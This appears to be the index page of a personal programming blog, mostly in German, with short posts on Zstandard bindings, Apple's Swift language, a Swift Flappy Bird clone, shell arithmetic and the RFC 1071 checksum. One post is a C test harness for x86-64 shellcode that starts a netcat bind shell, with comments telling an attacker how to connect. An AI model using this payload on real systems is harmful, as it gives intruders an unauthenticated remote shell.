Okt 16 06

datacompressionZstandard also called Zstd is a real-time compression algorithm, providing high compression ratios developed by Yann Collet.
Zstd’s reference language is C but there are a lot of other bindings:

  • Java by Luben Karavelov
  • Rust by Alexandre Bury
  • C# by SKB Kontur
  • Python by Gregory Szorc
  • Python by (simple) Sergey Dryabzhinsky
  • Node.js by streams albertdb
  • Node.js by buffers Zwb
  • PHP by Kamijo
  • Perl by Jiro Nishiguchi
  • Ruby by Jarred Holman
  • D by Masahiro Nakagawa
  • Ada by John Marino
  • Erlang by Yuki Ito
  • Go by Vianney Tran
  • OCaml by ygrek
  • Delphi by Razor12911

Finde out more:
Website
Repository
Benchmarks
Smaller and faster data compression with Zstandard

written by d45id \\ tags: , , , , , , ,

Jul 16 06
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <stdio.h>
#include <string.h>
 
// Victim: netstat -an | grep LISTEN | grep tcp
// Attacker: nc <victim_IP> <port>
 
unsigned char code[] = \
 
#define PORT "\x39\x39"
// Keep to two bytes
 
"\x48\x31\xff\x48\xf7\xe7\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x6e\x63\x57\x48\x89\xe7\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe3\x68\x2d\x6c\x76\x65\x48\x89\xe1\x68\x2d\x70"PORT"\x48\x89\xe6\x50\x53\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
;
 
int main ()
{
    // I make sure there are no nulls
    // The string count will terminate at the first \x00
    printf("The Shellcode is %d Bytes Long\n", strlen(code));
 
    // Next I throw 0xAAAAAAAA into every register before shellcode execution
    // This ensures that the shellcode will run in any circumstance
 
	__asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
		"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" 
		"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" 
		"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" 
		"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
		"call code");
	return 0;
}

written by d45id \\ tags: , , , ,

Jun 14 06

flappyswiftNich einmal ganz 24 Stunden nachdem Apple die Programmiersprache Swift vorstellte veröffentlichten die beiden Programmierer Ari Lerner und Nate Murray ihren in Swift geschriebenen Flappy Bird-Clone auf Github.

Bis Swift Programme einzug in den AppeStore erhalten wird es wohl noch bis zum offiziellen Release von iOS 8 und OS X Yosemite dauern, aber bis dahin zeigt sich aber schon welches Potenzial Swift mit sich bringt und wie vergleichbar einfach der Einstieg ist.

written by d45id \\ tags: , , , ,

Jun 14 03

Apple-swift-logoGestern stellte Apple auf ihrer Entwicklerkonferenz WWDC 2014 ihre neu entwickelte Programmiersprache Swift vor.

Bei Swift handelt es sich um eine objektorientierte Sprache und befördert Objectiv-C nun endlich auf das Abstellgleis. Apple hat sich bei der Umsetzung Mühe gegeben und viele nette Konzepte moderner Programmiersprachen wie Klassen, Vererbung, Closures, Typinferenz, Generische Typen, Namensräume und multiple Rückgabewerte umgesetzt.

Eine Beta-Version von Swift kann über das  iOS- und OS X-Developer-Programmes bezogen werden. Eine  Dokumentation steht im iBook-Store zum kostenlosen Download bereit.

written by d45id \\ tags: , , ,

Mrz 13 28

TerminalAus gegebenen Anlass möchte ich aufzeigen wie sich Rechenoperationen auf UNIX/Linux CLI durchführen lassen. Diese Operationen lassen sich natürlich auch in Skripten verwenden.
Im folgenden möchte ich vier Möglichkeiten zur Berechnung vorstellen, die sich auf so ziemlich jedem aktuellen UNIX/Linux anwenden lassen. Continue reading »

written by d45id \\ tags: , , , , , , , ,

Nov 12 23

In den vergangenen Wochen beschäftigte ich mich etwas mehr mit JAVA. Hierbei insbesondere mit der Implementierung einiger „Internetstandards“. So auch mit der Berechnung der Internetprüfsumme, welche im RFC 1071 definiert ist und hauptsächlich bei den Internetprotokollen IP, UDP und TCP zum Einsatz kommt. Continue reading »

written by d45id \\ tags: , , , , , , , ,